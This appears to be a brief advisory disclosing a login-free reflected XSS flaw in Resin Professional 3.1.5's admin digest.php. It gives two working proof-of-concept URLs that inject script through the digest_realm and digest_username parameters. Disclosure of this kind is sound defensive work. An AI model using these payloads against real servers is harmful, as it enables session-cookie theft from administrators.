This vulnerability do not need to login.digest.php use the REQUEST method in a wrong way to accept parameters,the malicious user could submit xss code on this page and an attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
exp: http://test.com/resin-admin/digest.php?digest_attempt=1&digest_realm=";><script>alert("ZnVjayBjbnZk")</script><a&digest_username[]= http://test.com/resin-admin/digest.php?digest_attempt=1&digest_username=";><script>alert("ZnVjayBjbnZk")</script><a Test on Resin Professional 3.1.5
